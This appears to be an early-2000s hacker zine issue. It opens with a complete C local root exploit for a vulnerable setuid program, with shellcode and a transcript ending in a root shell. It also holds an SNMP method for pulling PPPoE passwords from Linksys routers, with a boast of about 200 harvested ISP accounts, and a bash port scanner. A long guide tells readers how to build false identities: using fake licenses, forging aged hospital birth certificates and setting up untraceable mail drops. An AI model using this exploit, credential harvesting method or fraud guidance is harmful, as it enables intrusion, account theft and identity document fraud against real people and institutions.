vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc
www.hypervivid.com
www.hcsw.org
fractal@efnet
doug@saturn:~/devel/vulndev$ uname -mnrsp
Linux saturn 2.4.19 i686 unknown
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c
doug@saturn:~/devel/vulndev$ su
Password:
root@saturn:/home/doug/devel/vulndev# chown root vulndev2
root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2
root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2
root@saturn:/home/doug/devel/vulndev# exit
doug@saturn:~/devel/vulndev$ ls -al vulndev2
-rwsr-sr-x 1 root root 18373 May 24 04:16 vulndev2
doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c
[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com
[*] Using offset bffff86c
[*] Removing old log file 'db.log'
[*] Sploiting...
;;����;;
sh-2.05a# whoami
root
sh-2.05a# exit
doug@saturn:~/devel/vulndev$
#include <unistd.h>
#include <ctype.h>
#include <stdio.h>
/* my strtok's, well... don't ask */
int my_hatoi(char *tp) {
int t=0;
char tc;
if (tp[0]=='0' && tp[1]=='x') tp+=2;
while(isxdigit(tc = tolower(*tp))) {
if (isdigit(tc)) t = (t<<4) + (tc - '0');
else t = (t<<4) + (tc - 'a' + 10);
tp++;
}
return t;
}
int main (int argc, char *argv[]) {
// shellcode for Linux/x86 by Aleph Null
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char sploit1[2000];
char sploit2[100];
int i, ADDR_OF_BUF, *tp;
printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n");
if (argc != 3) {
printf(" Usage: %s <path to vulndev2> <offset>\n", argv[0]);
printf(" Offset should be the location in memory of the 'buf' variable\n\n");
return 0;
}
ADDR_OF_BUF = my_hatoi(argv[2]);
printf("[*] Using offset %x\n\n", ADDR_OF_BUF);
/* Remove the old log file */
printf("[*] Removing old log file 'db.log'\n\n");
unlink("db.log");
// Everything to 'a's
memset(sploit1, 'a', sizeof(sploit1));
// Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way)
*((int*)(sploit1+92)) = ADDR_OF_BUF-4-2;
// The magic number for FILE structs on glibc is 0xfBAD! Dig?
tp = (int*) (sploit1+96);
tp[0] = 0xFBAD0101;
// The FILE struct BS, we don't really care: we just want the ...
for(i=1;i<40;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4));
// ... jump table
for(i=40;i<48;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4));
// Tag the shell code on at the end
memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode));
// Use arg #2 to point F1 to our FILE struct
memset(sploit2, '\0', sizeof(sploit2));
*((int*)sploit2) = ADDR_OF_BUF+96;
// There's a bad moon on the rise...
printf("[*] Sploiting...\n\n");
execl(argv[1], argv[1], sploit1, sploit2, NULL);
return 0;
}
---
<dec0de> sniff sniff drunk pony
<caesium> you're so gay, dec0de
---
Waste - By son4r
Wow.. My first ever attempt at writing a file.. And it's for the popular Nettwerked.Net
K-1ine Zine! w00t! I'm 31336.5 all the way! Actually. I was recently playing with the
"illegal" program WASTE accidentally leaked on to the net by Nullsoft, the crew that
brought you Winamp and figured I could be the first to tackle an informative file on
this super cool program. Okay I'm lying. I wanted to look cool by doing something neat
for K-1ine! This article is to inform. Nothing more. Nothing less.
--------------------------------------------------------------------------------------
Open your mind. Imagine a program so secure Governments could use it. The features of
Waste are similar to those of file-swapping services such as Kazaa and the obsolete
Napster, but the difference is that only small networks of users (up to 50, according
to sources) can use it. Waste also offers encryption and authentication to prevent
uninvited users from accessing the networks. Waste had been used internally to share
files between AOL's San Francisco office, where Nullsoft is based, and its Dulles, Va.,
headquarters. For some unknown reason, AOL forced their Nullsoft unit to remove the
program from the website and in place put up a notice basically stating that anyone who
downloaded the software is to immediately delete any existing copies of it they may have.
Unfortunately I have been unable to find a reason as to why AOL had Nullsoft remove the
software. Popular software news sites have been unable to get comments from AOL represen-
tatives.
"NOTICE OF UNAUTHORIZED SOFTWARE
An unauthorized copy of Nullsoft's copyrighted software was briefly posted on this website
on or about Wednesday May 28, 2003. The software was identified as "WASTE" (the "Software")
and includes the files "waste-setup.exe", "waste-source.zip", "waste-source.tar.gz" and any
additional files contained in these files. Nullsoft is the exclusive owner of all right,
title and interest in the Software. The posting of the Software on this website was not
authorized by Nullsoft. If you downloaded or otherwise obtained a copy of the Software,
you acquired no lawful rights to the Software and must destroy any and all copies of the
Software, including by deleting it from your computer. Any license that you may believe you
acquired with the Software is void, revoked and terminated. Any reproduction, distribution,
display or other use of the Software by you is unauthorized and an infringement of Nullsoft's
copyright in the Software as well as a potential violation of other laws.
Thank you.
Nullsoft"
SET-UP: Although it's a pain in the arse to set up, if you do finally figure it out.
This program is wonderful!
This program sets up quite different from most normal Instant messengers or File Sharing
programs. To start with, you are asked to generate a "User Number" by moving your mouse
randomly around a box. Then you add the basics - a Username, a Real Name, your connection
speed and a network name, which is needed to access other nodes on this network. The Next
screen you see after that is the Private key Generator. You are prompted to enter a "pass-
code" or password, and then the cool part; your encryption size. You can choose from 1024,
1536, 2048, 3072, 4092. The recommended is 1536. After you choose your encryption size,
you have to randomly generate more numbers for the encryption. Then depending on the size
of the encryption you chose, it will randomly generate your Private key and your public key.
This is what the information for the username bob and the passcode Pink would look like with
1536 encryption:
Key signature:87F5187E66B0EC49BBEFC5055D0E2EEEC6C58783
WASTE_PUBLIC_KEY 20 1536 bob
CBE6D86D517A01C8188055679661C3A5839802461F31612B191EDA2FB159
BF8C99DD0BA6F3DDDFE685E222D44966DA36599BCA2E26C1DD5D4D659185
49C6A2E8360A4B5DB6C4A8EA61E83991F9C3894AA426FBD7DDE3C1AD2DD1
46D6153964036C93B7202003FA73461521DD93BE83AE7B0C7FA33B32EFE0
8D4CD90F42BC9E43E49FC09A0654860764734207F75304834869D8005E62
19D12E82B3D522F02BB8003A50AF78EF8C58A04365B2C6C088821EDD6357
89EC29E71746C5BE43E95DE10003010001
WASTE_PUBLIC_KEY_END
After that, you can add public keys to your listing of users allowed to access you.
Then you choose the download directory and the directory's that you want to share.
Features:
Public/Private IRC like Channels
Person to person file transfers
- Both upload and download
- Users can upload files to another users computer. the default
folder for this is Downloads in the waste installation folder
- Users can download files from folders chosen by the user they
are downloading off of. Multiple folders can be chosen and a
very simplistic file browsing system is implemented.
Instant Messaging
- Users can talk privately to one another instead of being forced
to use a public or private room
The Help Menu:
Commands:
/msg <user> <text> Easy enough to understand
/query <user> Private messages just like IRC
/whois <user> Who is this user? Another IRC feature
/join <channel> Self Explanatory
/me <action> Actions of course
/search <searchterm> File Search anyone?
/browse <user|path> Self explanatory
/leave Quit... I think it was
So here you have it. Waste. Unfortunately because this is apparently "Illegal"
and therefore it wouldn't be advisable for me to post a link to the source
download. I can't give you a copy. But! I can give you something better. Go
to http://www.google.ca and type in "Nullsoft Waste Download" and you'll find
many different mirrors for you to download off of. Thank you and good night!
[FIN]
---
<msViolet> what was it like?
<theclone> what is voodoo machine like...
<msViolet> it reminds me of tek wars :/
<theclone> it's like, well it's like mexico city beggers. Except these beggers
are wearing $1200 suits and they don't say please and thank you
<theclone> forgive my twisted metaphor
---
% Waste Network Advisory
% June 6, 2003
% jdm, j.miller@shaw.ca
- Introduction
For those of you who don't know, Waste is a secure P2P and chat client released
by Nullsoft. Waste allows users to set their own network name, so that only other
Waste users with both your key and the same network name as you. This function can
provide some extra security, however it has one major flaw. If your network name is
switched not only do you remain connected to your current network, you also connect
to the newly specified network. All of the networks you are connected to are merged
together, and users of both network will now be able to chat and share files with
one another. This could possibly pose a serious threat to a business network if an
employee were to change his or her network name allowing outside user to access
whatever sensitive file being shared on the company network.
-----
- The Problem
Under 'file > options > network' one can change the name of his or her network
so that he/she can connect to other users with his/her public key using the same
network. Once connected to the specified network the user can chat and download
files from all other users on the same network.
If a user were to change his or her network name mid session, they would remain
connected to the current network, and at the same time connect to the newly
appointed network.
The flaw in this is that both all networks that users is currently connect to
merge together, allowing users of both networks to chat and share files with one
another.
Now any files that may have been "secure" within one network are now available
to all other networks that any given user may be connected to at the same time.
Fixing this mistake can also be troublesome. If you were to of made this mistake
you will first have to change back to your old network name, and wait for any other
users on the unwanted network to disconnect before the two networks will become
individual again.
PLEASE NOTE:
There is no reason for a user to change his or her network ID while already on another
network, unless the user is completely braindead or too lazy to create a new profile.
If a user wishes to access more than one network safely, I suggest that he or she makes
a seperate profile for each different network. A new Waste profile can easily be created
by going to 'file > preferences > profiles > profile manager'. From there you can then
make a new user and key. This new account could then be used to access a seperate network.
-----
- The Solution
At this point in time the only fix I can see is to disconnect from your current network
before changing your network name, and to not share your network name with any troublesome
users with your public key. And as mentioned above, I suggest using only one network ID for
each user/key that you have created.
-----
[Thanks to son4r & Debolaz for their help]
---
<theclone> dec0de - the mormon guys told me that Jesus was the savior, but when I asked
"Savior of what..." they didn't respond. They just stared at me with a dopey glazed over
look and smiled.
---
Hack lynksys routeur pppoe
by Dunter
Dunter76@id.ru
One newbies, one days tell me is over protected behind is router.
After my scan with nmap, I just found SNMP open (port 161 udp).
I scanned the MIB, and found some thing very interesting.
on plages
enterprises.3955.3.4.1.12.0 : the b1
enterprises.3955.3.4.1.13.0 : the password
with SNSCAN from foundstone and SNMPWALK, in 15 minutes I found at least
200 access of sympatico, and commercial clients (unlimited bandwidth),
sympatico.ca,qc.aira.com,bellnet.ca,bellnexia.net,on.aibn.com, etc..
Now it is more than 3 months later, and I tried to tell to Bell and Lynksys
about the weaknesses, but they never returned my calls or even my e-mails.
This bug is good for all ISP's with PPPoE on lynksys routers.
Next time I will present 3 other bugs for sympatico and mc videotron, soon.
--------------------------------------------------------------------------------
un gars me nargais et me disait qu'il etais blinder deriere son routeur.
apres un scan avec nmap ,j'ai que trouver que le SNMP de ouvert(port 161 UDP)
apres un ballayages du MIB jai trouver quelque chose de interessent.
aux plages
enterprises.3955.3.4.1.12.0 : le b1
enterprises.3955.3.4.1.13.0 : le password
avec snscan de Foundstone et snmpwalk en 15 min jai trouver 200 acces sympatico.
et meme les acces des compte commerciaux de bell(bande de debit non calculer).
sympatico.ca,qc.aira.com,bellnet.ca,bellnexia.net,on.aibn.com, ect..
Depuit 3 mois jai avertit bell, et lynksys ,de leur faiblesses
mais bon il semblerais qu'il ont autre chose a faire.
ce problemes marche pour tout les ISP qui utilise PPPoE
J'ai 3 autres bug pour sympatico et les mc videotron, avenir.
- 06/03
---
# A simple (noisy!) TCP scanner.
# call as 'script hostname [ tcp | udp ]'
#
#!/bin/bash
for a in $(yes scan | head -1024)
do
(( start++ ))
if [[ -n $(echo "" > /dev/$2/$1/$start && echo "up") ]]; then echo "Port $start" >> /tmp/scan; fi
done; clear; cat /tmp/scan; rm /tmp/scan
~ Seuss
---
<rt> just remember the power of voltron
= wizbone_/#hackcanada tries
<wizbone_> it hurts to remember
<rt> then forget the power of voltron
<rt> and remember the power of grayskull
<wizbone_> it hurts to remember
<rt> blast
---
Identity New
The US Government has long been aware that individuals are, for a
variety of reasons, trying to create new identities. Criminals on the run
from the police, debtors seeking to walk away from financial demands,
fraudsters establishing new identities to commit crimes, absent fathers
evading child support payments, ex-wives seeking to evade violent
partners, ex-husbands seeking to evade large divorce settlements, etc.
Twenty years ago, prior to the advent of computerization, there was
little that could be done to combat identity changers. Such is the volume
of work of government departments (e.g. over 5 million new Social
Security Numbers are issued each year) that any elaborate form of
checking individual cases would simply have brought the system to a
halt. Computers are changing this - it is now possible to do crosschecking
at the touch of a button. The main culprit here is the Social Security
Number - this is now the standard means that both public and private
agencies use for tracking people; eg, go into a bank and ask to open a
new account, and as well as requesting some form of ID they will also
ask for your Social Security Number which they will instantly check on
the computer to see what information is held on you by credit reference
agencies. The Government is engaged on a long term program of cross-
referencing information between its various agencies, eg; the encouragement
of states to cross-reference birth and death records so that birth certificates
of now deceased people will be marked as such (thus eventually doing away with
the old scam of getting a copy of a deceased child's birth certificate and
using that to create a new identity). What does all this mean for the would-be
identity changer? Simply, that if you do go ahead with changing your ID, you
need to give each stage careful thought - thought as to how you're going to do
it and thought as to how you are going to cover your tracks in case any stage of
the process goes wrong (you don't want government agents on your doorstep asking
why you're requesting a drivers license in a name other than your own).
Which brings me to the Identity Theft and Assumption Deterrence Act
of 1998. This is the first piece of legislation enacted for the specific
purpose of deterring and punishing identity changers - these are its main
points:
- Identity theft (i.e. transferring or using another persons means of
identification) becomes a crime, subject to penalties.
- "Means of identification" is defined to include name, date of birth,
passport, social security number, official state or government drivers
license or state ID, alien registration number, and employer or taxpayer
identification number.
- The Federal Trade Commission is established as a clearinghouse to
receive and process complaints, referring incidents to the appropriate
authorities (eg credit reference bureaus or law enforcement agencies.
What are the implications of this? Probably not a lot. They aren't
going out proactively looking for identity changers. They are a reactive
organization and will only get involved if someone does something stupid
and catches the eye of someone in authority. However, more recently enacted
legislation, the Internet False ID Prevention Act, has had a big effect.
This federal law, which went into effect March 2001, makes it a felony for
US based websites to offer templates (which would be downloaded over the web)
to produce fake ID. Those who violate the Act could be sentenced to one year
in jail even if their template is used only to make one fake ID, and up to
twenty years if the template is used for more than five ID's.
This has resulted in the virtual disappearance of all US based sites
selling fake ID. There are still many sites offering fake ID but they are
either based abroad or they are selling stuff that won't be a lot of use
to anyone (e.g. European Student ID cards).
How much time and expense is involved?
This isn't something that can be done overnight. You need to allow a
few weeks, mostly because you'll be dealing with government and state
agencies by correspondence and at each stage you will have to wait for
them to get back to you (eg, requesting a birth certificate - some vital
records offices will oblige in a few days, some may take months).
The cost isn't going to break you. Generally just a few dollars here
and there in fees to the various state and government departments you'll
be dealing with. Your largest expense is likely to be renting a suitable
address or mailbox where correspondence can be sent.
Access to a computer is useful (presumably you have that otherwise
you wouldn't be reading this now) together with a good quality scanner
and printer. The computer is first of all invaluable as a means to access
all the information available on the web (and there is an awful lot of
information). Secondly, you may well find it necessary to scan in and
reproduce documents.
Fake Documents and Second Passports
If you have just read the above section (Legal or illegal?) you'll know
that since the Internet Fake ID Prevention Act, which came into force March
2001, most US based fake ID Internet sites have shut down. The authorities
are actively pursuing fake ID websites, and the penalties are harsh. The
remaining web sites generally fall into two categories:
1. Sites that apparently offer a large selection of high quality fake ID.
Usually based outside the US (often in the UK or Canada), these are often
scam sites that will take your money and send you nothing, or at best send
you some poor quality ID that will be of no use to you. Who are you going
to complain to?!
2. Sites that provide bogus Employment ID cards or International Student
ID cards. These may be useful as secondary ID, but nothing more.
So, if you can no longer buy ID over the net, where can you get it?
You really only have two alternatives: 1. Make it yourself. This is still
possible if you have the use of a computer and a printer. All the materials
are available and there is a wealth of literature available giving technical
advice on how to go about it.
2. Buy from the street. There is a lot of fake ID available - the best places
to look are college campuses or inner city areas in cities with large
numbers of illegal immigrants. The obvious drawbacks here are that a lot
of what you are going to be offered is going to be of very poor quality.
The main problem with fake ID, however, is that it isn't verifiable. If
you get stopped for speeding and produce a fake drivers license it will only
take a few seconds for the officer to do a check and realize that your license
is a fake.
A more serious problem for the identity changer is the availability of
hand-held verification machines - they're cheap (even nightclub bouncers
are getting them) and easy to use (your ID is just swiped through it).
Technology will increasingly be used by governments to fight fraud -
more and more drivers licenses now have holograms on them. Holograms are not
impossible to fake, but they add considerably to the level of skill involved
and make it less likely that a forger would be able to reproduce a whole range
of state and provincial ID as in the past.
The US government is currently implementing a program to modernize
passport issuing with a view to combating documentation fraud - this
includes digitizing the passport photo to combat photo-substitution fraud
(so that the original passport photo is available online to immigration
officials to compare against the actual photo displayed in the passport).
Plus, an electronic case management system is being developed to allow
passport application clerks to view online any information they hold on
applicants (e.g. those who have made false statements regarding previous
passport applications), including images of birth certificates, etc. In
reality, all this is probably some years away - apart from the practicality
of implementing such a scheme, there are also cost and privacy issues.
However, this isn't to say that fake ID is no use at all. There may be
occasions when establishing your identity that fake ID may come in
useful. For example, when requesting a birth certificate you may be
asked by some vital records offices to supply a photocopy of your drivers
license... which is where a fake one comes in useful (a fake license from
a different state of course, more difficult for the clerk to query).
Second Passports. You may have heard of people getting second
passports and wondered what that was all about. It isn't directly related
to getting a new ID but I'll mention it anyway.
It basically means getting a passport for another country so that you
can travel using this passport, open bank accounts around the world using
it as ID, and maybe even reside in the country that issued this passport.
So, if you're a US citizen and you're thinking that sounds good, here's the
downside...
Firstly, in US law you can't have a second passport because it means
you've pledged allegiance to another country other than the US. If you
take another passport you are theoretically supposed to give up your US
citizenship. However, in practice this is not a problem simply because the
US authorities will never know that you've got this second passport. So,
lets discount this objection.
No, the real problem lies in the fact that unless you're willing to spend
hundreds of thousands of dollars you may be wasting your time... and
here's why.
These second passports are legitimate passports issued by bona fide
authorities (or their agents) by actual countries, but the catch is that most
of them are third world countries or developing countries (e.g., Belize,
Columbia, Grenada - these countries do it quite simply because it's a
useful source of income) where either you wouldn't want to live anyway
or, more importantly, you will need to get a visa to travel to most of the
countries you want to visit anyway on the passport (e.g. the US, Canada,
Britain, France, Germany, etc). Getting a visa isn't a formality - it may
involve an actual interview with an official at the local consulate of the
country you wish to visit - if they have any doubts about you they won't
let you in.
But, like I mentioned, if you are prepared to spend a lot of money it
may be worth looking into. It is possible to obtain citizenship of some
perfectly respectable countries (e.g., Argentina, Ireland) by undertaking
to invest a large sum of money in their economy (although be warned,
this isn't an easy option - generally speaking, the more respectable the
country the more likely they are to perform background checks on you to
ensure that they are granting citizenship to a respectable person).
If this is a route that interests you I suggest you do a search on the
web - just search for "second passports" and you'll find numerous sites
offering them.
A little background research
If you do intend to change your identity and you are not in any rush,
I would suggest that you might want to spend some time looking at the
study of genealogy (the process of tracing your ancestors). Maybe try and
trace your own family back a few generations, finding their birth, death
and marriage records. This will familiarize you with some of the
processes involved, get you used to talking to clerks, etc, and maybe put
you a little more at ease for when you start the process of creating a new
identity.
Establishing a Mailing Address
Before you start the process of creating a new identity with new
documentation you first of all need to set up an address where all your
mail can go. This is so that there is no link between the old you and the
new you. Firstly, if anything goes wrong during the creation of the new
identity you want to be able to walk away from it, with nothing linking
the scheme to you. Secondly, once the identity has been created you do
not want to jeopardize it - you don't want someone from your past to
come looking for you and be able to trace you.
The traditional method has always been to rent a mailbox (cheap and
easy). When corresponding with state and government departments it has
always been possible to disguise the fact that you're giving a mail box
address by giving the mail box number as though it were the number of
an apartment or suite at the address (e.g. give the address as Suite 59,
not Box 59). This is no longer possible. Under a new rule of the postal
service, all mail to mailboxes will be returned to sender unless correctly
addressed. This now means that the address has to include the letters
PMB to indicate that you are writing to a mailbox.
I do also suspect that some government departments are getting more
suspicious when it comes to dealing with requests for documentation (the
problem of identity theft, the events of September 11th, etc). This may
make it just that little more difficult to request documents by post - for
example, if you're requesting a birth certificate, and you send a money
order for payment, using a PO box as an address with no phone number,
then don't be surprised if you get no reply. There is every likelihood that
those sorts of requests are going to be treated with suspicion and put to
one side.
So, what's the solution? The simplest course of action is to approach
someone who rents out cheap office space. Tell them that you've got a
small business but that you don't wish to give out your home address, so
you're looking for a cheap alternative. Can you either rent a very cheap
office or, better still, maybe they would be prepared to accept your mail
in return for a weekly fee? Keep looking and you are sure to find
someone willing to do a deal, especially if you are prepared to pay cash.
This is important - you don't want to pay by credit card or check because
it can be traced back to your old identity.
You'll probably only need the address for a maximum of three months
anyway to establish the new ID. If you get any mail after this you can
always call in and collect it - when a lease is over, they don't usually
mind you calling in occasionally to collect anything that may have come
in.
Or, how about this for a clever idea. Pick out a small local one-man
business (for example a barbers shop) and post a letter there. Call in a
few days later and explain that you've just moved into the area, and that
you've accidentally given the wrong address to a couple of people... sorry
for any inconvenience, but would it be possible to call in and collect any
other mail that comes? If he says yes then you've got your mail drop, free
of charge and with absolutely no way of tracing you.
Just as a matter of interest, if any of you out there are worried about
going to collect the mail from your mail drop, because you're expecting a
dozen law enforcement officers to grab you and throw you to the ground
because they have discovered your little scam, then don't worry. With
police and government resources being limited, firstly they generally
only go after people if a large amount of money is involved, and
secondly they never ever waste time on speculative surveillance
operations again unless a large amount of money is involved and thirdly,
cases like this very often involve problems of jurisdiction (you may be
requesting documents from another state or even another country).
I'll tell you a little story, which alerted me to the attitude of the
police. It surprised me at the time because like most people, I had little
dealings with them (nothing more than the odd parking ticket), I was very
law-abiding and tended to assume that the police were all powerful, all
seeing, the guardians of law and order, etc, etc. I worked in a cellular
phone store a few years back and as you must be aware, before you can
have a phone on a monthly price plan you need to be credit checked. We
credit checked a middle aged man, and he passed the check. We filled out
the airtime agreement there and then (plus taking photocopies of his
proofs of ID), and he said he'd call in the following day at 2pm and
would actually take two phones (this wasn't unusual, men would often
get a second phone for their wife). The following morning one of my
assistants in the store was going through the paperwork, preparing this
mans phones for collection. I can't remember now what the discrepancy
was, but she noticed something amiss - something aroused her
suspicions. So, on her own initiative she phoned the mans bank (we had
his bank details on the airtime agreement). The bank immediately
confirmed that the man was a fraudster - he got a stolen checkbook and
ID, and they'd had numerous dud checks from him. So it was agreed with
the bank that we would contact the police and that hopefully they would
be able to come down and wait for him to appear at 2pm. You'd think
nothing could be simpler, but I was wrong. I phoned the local cops and
explained the situation to them - complete disinterest was how I would
summarize their response. As far as they were concerned, no crime had
yet been committed, and if there was a crime it wasn't a particularly
serious one, and even though the man had very conveniently given us the
time he expected to be in our store, this couldn't be guaranteed, so from
their perspective the whole thing was possibly a waste of their precious
time (I should also point out that the police station was only 5 minutes
from the store).
At this time I was in another of our stores, but I relayed this
conversation to the two girls who were working at the store where the
man was due to come in later that day. The girls were understandably
surprised, and also shaken, because of course it meant that they would
have to face the man on their own - it would at the very least be
unpleasant. After putting down the phone from talking to me, one of the
girls had the presence of mind to call the bank back and explain the
situation to them. The bank were also surprised at the response of the
police - however, they knew that there was already an ongoing police
investigation into this man because of previous check frauds. They were
able to contact the appropriate police department and the man was
subsequently arrested that afternoon in the store.
Phone Number. When dealing with state and government departments
they often request a contact phone number. You've got two options here.
You can either rent a secretarial service, so that your "office" will answer
the phone and take a message for you. This is relatively inexpensive
(usually it's charged by the month). You can simply ring in each day to
check if there are any messages for you. Alternatively, a recent option is
a mobile phone on a pre-pay scheme. It's now possible to buy a mobile
phone without a contract and pay for the usage by purchasing monthly
airtime vouchers. This means there is no annual contract so you don't
need to be credit checked, which is important because you don't want to
give your actual name and address. They still may ask for some ID (this
will vary depending on the company) - but it's probably nothing you
couldn't get round with some false ID.
FORMS OF ID (USA)
A. Birth Certificate
B. Social Security Number
C. Drivers License
D. Passport
A. Birth Certificate
Before going into detail about birth certificates it's probably
worthwhile to take an overview of the whole system so that we can see
what we are dealing with.
The great advantage for the identity changer is that the whole system is
decentralized. It's developed over the years at local level, with little
attempt to standardize across the nation.
The government is aware of the limitations of the system, particularly
the ease with which certificates can be fraudulently obtained or
reproduced, but there aren't any easy solutions for the government. Here
are a few facts:
6,422 different entities currently issue birth certificates
14 states allow open access to birth certificates (California, Iowa,
Kentucky, Maine, Massachusetts, Minnesota, New Jersey, North
Carolina, Ohio, South Dakota, Tennessee, Vermont, Washington,
Wisconsin)
Over 14,000 different versions of birth certificates are in circulation
Federal and state agency staff have only limited training to detect
fraudulent certificates
Birth certificate fraud is seldom prosecuted unless it can be linked to
other large dollar losses or other punishable crime
In 28 states birth certificate fraud remains a misdemeanor
The majority of states have a decentralized approach to issuing
certificates, relying on local offices over which they have little control.
Only 11 states use a centralized operation for issuing certificates.
The sale of certificates serves as a source of revenue (in some cases the
only source of revenue) for state health departments, so there is little
incentive for restricting their sale.
A 1999 statement from the Office of Passport Policy, Planning and
Advisory Services before the Subcommittee on Immigration and Claims
Committee on the Judiciary US House of Representatives reported the
following: "The integrity of birth documentation and the potential for
fraud are of great concern to us. An individual's US certificate of birth
is primary evidence of citizenship. When an individual born in the United
States applies for a passport for the first time, the evidence of citizenship
presented is usually a US birth certificate. We need that document to be
reliable because, after the first application, the passport itself is used
as evidence of citizenship. If a US passport is issued on the basis of a
counterfeit or altered birth certificate or a genuine birth certificate
presented by an impostor, the original evidence may never be examined
again and the problems are compounded."
"There are many thousands of offices nationwide authorized to issue
certified copies of US birth certificates, which come in hundreds of
different formats. These include long-form birth certificates issued by
state, county or municipal entities, as well as shortened versions, called
abstracts, or transcriptions, which contain only limited information. We
have also seen wallet-sized versions. Format changes are plentiful. They
reflect new issuance procedures, new paper stock, or a newly appointed
registrar. To further complicate the matter, some states issue local birth
certificates to children who have been born abroad and adopted by US
citizens, in addition to birth certificates amended to reflect domestic
adoption. States also issued delayed birth certificates, on the basis of an
oral declaration only, often years after the alleged birth. An example is a
case of a foreign couple who were able to obtain a two-year delayed birth
certificate, on the basis of an affidavit, for a baby who they claimed had
been born in a hotel room while they were here on vacation, with no
witnesses other than the alleged father, who just happened to be an
obstetrician, and no outward signs of birth left in the hotel room. The
parents claimed to have returned to their homeland the day after the
alleged birth, leaving the baby with an acquaintance for the next two
years. As you can see, the potential for fraud is very real."
"Furthermore, birth certificates can be falsified with relative ease,
with widely varying degrees of quality and sophistication. At the low-end,
we see photocopies of legitimate birth certificates with the original name
deleted with typewriter correction fluid and a new name typed over.
These types of documents are generally purchased from a street-level
vendor, exploiting migrant workers and uneducated aliens. However, any
individual can produce such a document."
"At the high-end, we see computer-generated copies of birth
certificates using virtually the same ink, paper, and printing fonts as a
legitimate birth certificate. While these can be detected in the passport
application process, it requires extensive research and checks of records
in the jurisdiction which would ordinarily issue the legitimate
certificate."
"In many instances, legitimate birth certificates are purchased from
US citizen accomplices. To cite one example, the Department's Diplomatic
Security Service, which has statutory authority to investigate passport
fraud, recently had a case of an alien-trafficking operation that recruited
American citizens (out of a methadone clinic) to obtain and sell their
birth certificates. The birth certificates were then used illegally for a
number of purposes - the primary one being application for a US passport."
"Additionally, fraudulent applicants are able to obtain the legitimate
birth certificates of deceased persons because some states do not cross-
reference the records of birth and death. Many states participate in a
voluntary interstate program to exchange information when an individual
aged 45 and younger dies. Even in states that cross-reference internally
and share information with other states, limited personnel resources may
mean that records are not cross-referenced immediately upon receipt of
death notification. The speed at which records can be cross-referenced is
important because impostors are prepared to take advantage of any lag-
time between a death in one state and its recording in another state. We
have seen cases where an individual born in one state is killed in an
accident in another. Someone spots the obituary, gets a copy of the birth
certificate, obtains identification under the new identity, and applies for
a passport - all before the death record is filed in either state."
"The State Department considers the more than 4,000 passport
acceptance officers nationwide to be our first line of defense in detecting
fraudulent documentation. We have training programs to alert them to
possible impostor fraud, and we ask them to report suspicious behavior to
the passport agencies. There is a Fraud Programs Manager at each of the
14 passport agencies. When there is a question about a birth certificate or
other document, our Fraud Program Managers routinely contact the
office that purportedly issued the suspect document."
The birth certificate is the foundation document of your identity -
from this flows all other documents. It is therefore imperative that you
concentrate your efforts on making this document as authentic as
possible. There is a lot to learn here, so I have broken it down into
different sections to make it easier to understand:
(a) What kinds of certificate are there?
(b) Requesting a copy of a birth certificate.
(c) Does everyone have a birth certificate?
(d) How do I create an authentic birth certificate for my new identity?
(a) What kinds of certificate are there?
(1) Hospital birth certificate
(2) State issued certificate
(3) County issued certificate
(4) Baptismal certificate
(1) Hospital birth certificate. This certificate is issued either by the
hospital where the birth takes place, or by an attending doctor or midwife
if the birth occurs outside of a hospital. It is an official and legal
document. It records the name and location of the hospital, the child's
name, sex and time of birth, the parent's names and ages, and the
signatures of the attending doctor and a witness. Plus, usually the
hospital's seal is on this document.
The original copy is given to the parents and a photocopy is sent to the
county records office. This photocopy is usually destroyed once the birth
has been recorded by the records office.
The system sometimes breaks down when the birth takes place outside
of a hospital. The hospital type birth certificate is still issued, but it is
not uncommon for a copy of it not to be sent to the county records office, so
that the birth is never officially recorded. The doctor or midwife will
issue a certificate to the parents, requesting that they take the certificate
to the records office to officially record the birth, but the parents never
get round to doing it.
Finally, of course, remember that any copy of an adult's hospital birth
certificate will now be old. They are only issued at the time of birth to the
parents, and the authorities do not keep copies to allow for requests to be
made for additional copies later on (because theoretically there's no
reason why anyone should require a copy because they should also have
been issued with a state or county birth certificate).
However, because so many people only have a hospital certificate and
no state or county one, then state and federal authorities will usually
accept a hospital one as being valid. This is of interest to potential
document forgers because hospital certificates are more difficult for the
authorities to verify because not only does the certificates appearance
vary from hospital to hospital, but also more importantly, unlike state
issued certificates, they do not have any unified system of numbering so
that their validity cannot be instantly verified. Plus, you can always
produce a certificate from a hospital that is now closed, making it
impossible to disprove, as long as the certificate has been "aged" to make
it look old.
(2) State issued certificate. Issued by the Bureau of Vital Statistics at
state level. All states issue their own certificates and so they differ in
appearance from state to state, and of course the designs are also
sometimes changed over the years. All state certificates have a state birth
number (based on a standardized system used nationwide) that the
authorities can verify (the number shows the state of birth, the year of
birth, and a random number). However, it should be remembered that in
the general course of events, unless your faked document arouses
suspicion in some way, no attempt will be made to verify it by any
department that is accepting it from you as proof of ID (this is because of
the additional volume of work that would be entailed, limited resources
and even privacy considerations). The state birth number makes
producing fake state birth certificates difficult, which is why most fake
ID companies will send you a hospital type certificate if you request a
birth certificate.
A state issued birth certificate could be old or new, issued shortly after
birth, or a recently requested copy. A requested copy of a birth certificate
from a vital statistics office, the quality of the copy will differ
considerably from state to state dependent on how they keep their records.
It could be a poor quality photocopy or a high quality printed version.
(3) County issued certificate. Issued at county level by the county health
department, county registrar or public records office. The appearance of
certificates differs from county to county, even within the same state, and
also from year to year as designs change. The certificate will have a
locally issued number on it - not instantly verifiable like the state type,
but still capable of verification if someone were to contact the records
office.
